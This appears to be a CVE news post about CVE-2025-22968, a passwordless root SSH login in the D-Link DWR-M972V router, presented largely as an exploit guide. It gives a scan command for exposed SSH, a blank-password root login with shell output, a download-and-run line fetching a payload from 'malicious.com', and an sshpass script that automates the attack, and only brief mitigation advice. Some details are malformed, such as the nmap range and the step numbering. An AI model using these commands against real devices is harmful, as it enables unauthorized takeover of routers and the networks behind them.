CVE CyberSecurity Database News

CVE-2025-22968 - Critical Root SSH Backdoor in D-Link DWR-M972V (1.05SSG) – Remote Code Execution Details and Exploit Guide

Poster -

A major vulnerability, CVE-2025-22968, has been discovered in the D-Link DWR-M972V router, specifically firmware version 1.05SSG. This flaw allows anyone on the network – or even over the internet if SSH is exposed – to *log in as root via SSH without any restrictions*. The attacker can then run any command on the device, putting your data, privacy, and local network at serious risk.

What is CVE-2025-22968?

CVE-2025-22968 is a remote code execution vulnerability found in the D-Link DWR-M972V router (firmware 1.05SSG). Attackers can connect via SSH as root, with *no password*, and execute arbitrary commands. This is essentially a hardcoded or unintended SSH backdoor left open, which lets anyone in.

SSH Configuration

Upon reviewing the firmware for version 1.05SSG, security researchers found that the router’s SSH server is enabled by default and listens on the WAN interface. More critically, one of the following shows up in the firmware’s /etc/passwd:

root::::root:/root:/bin/sh

Notice the empty section (between the first and second colon :) – it means the root account has *no password set*, allowing logins without credentials.

The /etc/ssh/sshd_config also includes

PermitRootLogin yes
PasswordAuthentication yes

Scan for routers with SSH (usually port 22) exposed. Example with Nmap

nmap -p 22 --open -oG - 1.2.3./24 | grep open

Just connect with an SSH client using *no password* for root

ssh root@TARGET_IP

When prompted for a password, just hit enter (leave it blank).

If the router is vulnerable, you’ll get a root shell

BusyBox v1.21.1 () built-in shell (ash)
# whoami
root
# uname -a
Linux DWR-M972V 2.6.36 #1 SMP PREEMPT ... armv7l GNU/Linux

Step 4 – Run Any Command

You now have full control. For example, dump credentials, modify firewall rules, open reverse shell to attacker server, etc.

Example – Download and execute malware

wget http://malicious.com/payload.sh -O- | sh

Here’s a simple Bash script to automate this attack

#!/bin/bash
TARGET="$1"
sshpass -p "" ssh -o StrictHostKeyChecking=no root@"$TARGET" "whoami; uname -a"

Install sshpass and run

chmod +x exploit-cve-2025-22968.sh
./exploit-cve-2025-22968.sh 192.168.1.1

References

- NIST NVD CVE-2025-22968 Entry *(may take a few weeks to appear)*
- D-Link DWR-M972V Product Page
- RouterSecurity.org: Unsecured Routers
- Firmware Extraction and Analysis Tools

Place the device behind a firewall, block port 22 if not necessary.

- Check for firmware updates on the D-Link support page.

Closing Notes

This is a scary vulnerability because it’s so simple to exploit, yet gives such total control to an attacker. If you have a DWR-M972V router or manage devices for your organization, take action right now.

Stay safe, patch often!

*If you found this exclusive breakdown useful, share it with other network admins and home users. Don’t be the next backdoor victim!*

Timeline

Published on: 01/15/2025 16:15:42 UTC
Last modified on: 03/14/2025 16:15:40 UTC